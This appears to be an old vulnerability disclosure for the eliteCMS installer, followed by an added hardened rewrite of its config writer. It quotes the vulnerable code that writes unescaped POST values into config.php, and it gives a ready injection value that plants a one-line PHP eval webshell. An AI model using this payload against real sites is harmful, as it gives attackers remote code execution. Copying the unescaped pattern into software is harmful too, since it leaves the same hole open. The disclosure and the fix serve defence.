eliteCMS: installer not validated + one-line webshell write vulnerability

Posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can visit the installer URL and run the installation again.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the session values are interpolated into PHP source with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
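As an added example (not code from the post above or from eliteCMS), here is a hardened version of the step-4 config writer that closes both holes: an install lock that refuses to run the installer again, allow-list validation of the database settings, and var_export() to emit every value as a quoted, escaped PHP literal so that nothing POSTed can break out of the generated define(). The file paths, function names and validation patterns are this example's own assumptions, and it reads the settings straight from $_POST instead of going through $_SESSION.

```php
<?php
// Added example, not eliteCMS code: hardened step-4 config writer plus install lock.
// CONFIG_FILE mirrors the target path from the post; LOCK_FILE, the function names
// and the validation rules are assumptions made for this example.
declare(strict_types=1);

const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';

/**
 * Refuse to run any installer step once installation has completed.
 * Closes flaw 1: without a lock, ?step=4 can be replayed at any time.
 */
function assert_not_installed(): void
{
    if (file_exists(LOCK_FILE)) {
        http_response_code(403);
        exit('Installation is already complete. Remove install.lock to reinstall.');
    }
}

/**
 * Allow-list the DB settings before they get anywhere near the template.
 * Returns the validated values; anything else throws.
 */
function validate_db_settings(array $post): array
{
    $rules = [
        // hostname or IPv4 literal, optional :port (IPv6 deliberately not accepted here)
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        // MySQL identifier characters only; 64 is MySQL's identifier limit
        'DB_NAME'   => '/^[A-Za-z0-9_$]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_$.\-]{1,32}$/',
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $value = (string)($post[$key] ?? '');
        if (!preg_match($re, $value)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $clean[$key] = $value;
    }
    // Passwords may legitimately contain quotes and punctuation, so they are not
    // allow-listed; var_export() in render_config() makes them a safe literal instead.
    $clean['DB_PASS'] = (string)($post['DB_PASS'] ?? '');
    return $clean;
}

/**
 * Render config.php with var_export(), so each value becomes a properly quoted
 * and escaped single-quoted PHP string. A DB name such as the post's
 *   "?><?php eval($_POST[c]);?><?php
 * is rejected by the allow-list above; even a password containing it stays an
 * inert string inside define() and never terminates the PHP block.
 */
function render_config(array $db): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($db[$key], true));
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;
}

assert_not_installed();

if (($_GET['step'] ?? '') === '4') {
    try {
        $db = validate_db_settings($_POST);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        exit(htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8'));
    }
    // Write to a temp file with restrictive permissions, rename into place,
    // then drop the lock so no further installer step can run.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, render_config($db), LOCK_EX) === false
        || !chmod($tmp, 0640)
        || !rename($tmp, CONFIG_FILE)) {
        exit('Could not write config file');
    }
    file_put_contents(LOCK_FILE, date('c') . "\n");
}
```

The two defences are independent: the lock stops the re-installation described in the post, and the allow-list plus var_export() stop the write-into-config.php trick even if the lock is ever removed. On a deployed site the quick check is to request the installer URL after setup and expect a 403 (or a 404 once the install directory has been deleted) rather than the installation form.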